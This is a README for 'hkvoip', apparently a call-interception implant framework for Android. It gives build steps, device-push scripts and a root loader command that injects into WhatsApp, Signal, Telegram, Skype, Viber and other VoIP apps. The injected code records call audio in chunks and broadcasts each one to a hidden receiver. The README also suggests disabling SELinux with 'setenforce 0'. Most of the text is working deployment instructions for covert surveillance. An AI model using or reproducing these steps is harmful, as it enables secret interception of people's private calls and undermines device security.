# android hkvoip framework
hooks VOIP applications, generic (all applications will work, regardless of version, no application specific code).

(c) wolf/ht 2017/2018/2019

tested up to Android Pie 9 on Pixel, Android 8.1 on Nexus 6p (with both 64bit and 32bit applications).

__should work on every android flavour from 4.4 onward with only minor adaptions (exported symbol names for AudioTrack and AudioRecord)__

## prerequisites
* Android NDK
* adb somewhere in path
* all commands below assumes executing from the root of this repository (/path/to/hkvoip)

## build frida sdk from scratch (tested up to frida 10.7.7 using Android NDK r15)
* will generate devkit-android-arm, devkit-android-arm64 in the android folder
~~~
cd ../
git clone --recurse-submodules https://github.com/frida/frida
cd hkvoip/android
ANDROID_NDK_ROOT=<path_to_ndk> ./build_android_devkit.sh ../../frida
~~~

### update frida sdk and build sdk from scratch...
~~~
cd ../frida
git reset --hard --recurse-submodules
git pull --recurse-submodules
cd hkvoip/android
ANDROID_NDK_ROOT=<path_to_ndk> ./build_android_devkit.sh ../../frida --clean
~~~

### ... OR use prebuilt frida (tested up to frida 12.6.10)
* may lead to larger binaries....
~~~
# download arm and arm64 devkits in the current directory
download_frida.sh android-arm,android-arm64 12.6.10 ./android
~~~

## build hkvoip and push to device
* tested with _ndk-bundle_ installed through Android Studio 3.4.1 (currently NDK 20.0.5594570)
* loader and the 2 shared libraries built will be pushed to __/data/local/tmp__
~~~
cd android
ANDROID_NDK_ROOT=<path_to_ndk> ./build.sh [clean] [-B to rebuild] [NDK_DEBUG=1 for debug build]
./copy_to_device.sh
~~~

## using loader
* loader stays resident watching for processes, injecting into them as they appear
* audio files are collected in __/data/local/tmp__
	* ogg/vorbis format, speex encoded


### loader parameters
* argv[1]: a process or a csv list of processes to be injected
* argv[2]: for 64bit os, a csv with path/to/64bit/so,path/to/32bit/so
	* if only the 64bit is provided, only 64bit processes are injected
	* for 32bit processes, argv[2] is a single path to the 32bit library to be injected
* argv[3]: __optional__, a string to control the encoder
~~~
# default is quality=5, vbr=disabled, complexity=3, split every 15 seconds, every audio chunk is broadcasted to com.android.wdsec.ProxyReceiver
q(uality)=0-10,v(br)=0|1,c(omplexity)=1-10,s(plit)=10-300,r=com.android.wdsec.ProxyReceiver
~~~

## sample usage
hooks all common voip apps
~~~
su
cd /data/local/tmp
# 1. setenforce 0 may be needed to disable SELinux, /data/local/tmp may need permissions for audio files to be written
# 2. adb logcat | grep secdbg in another shell to be used with debug build binaries to show logcat messages!
./loader com.google.android.talk,com.viber.voip,com,com.facebook.orca,com,org.telegram.messenger,org.thoughtcrime.securesms,com.whatsapp,com.skype.raider /data/local/tmp/libhkvoip.so,/data/local/tmp/libhkvoip32.so q=5,v=0,c=3,s=15,r=com.android.wdsec/.ProxyReceiver
~~~

